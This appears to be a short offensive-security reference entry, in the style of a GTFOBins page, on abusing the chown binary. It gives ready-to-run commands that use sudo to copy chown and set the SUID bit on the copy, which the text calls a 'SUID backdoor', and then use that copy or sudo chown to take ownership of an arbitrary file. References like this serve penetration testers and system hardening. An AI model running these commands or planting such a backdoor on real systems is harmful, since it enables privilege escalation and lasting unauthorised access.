This can be run with elevated privileges to change ownership and then read, write, or execute a file.
It runs with the SUID bit set and may be exploited to access the file
system, escalate or maintain access with elevated privileges working as a
SUID backdoor. If it is used to run sh -p
, omit the -p
argument on systems
like Debian that allow the default sh
shell to run with SUID privileges.
sudo sh -c 'cp $(which chown) .; chmod +s ./chown'
LFILE=file_to_change
./chown $(id -un):$(id -gn) $LFILE
It runs in privileged context and may be used to access the file system,
escalate or maintain access with elevated privileges if enabled on sudo
.
LFILE=file_to_change
sudo chown $(id -un):$(id -gn) $LFILE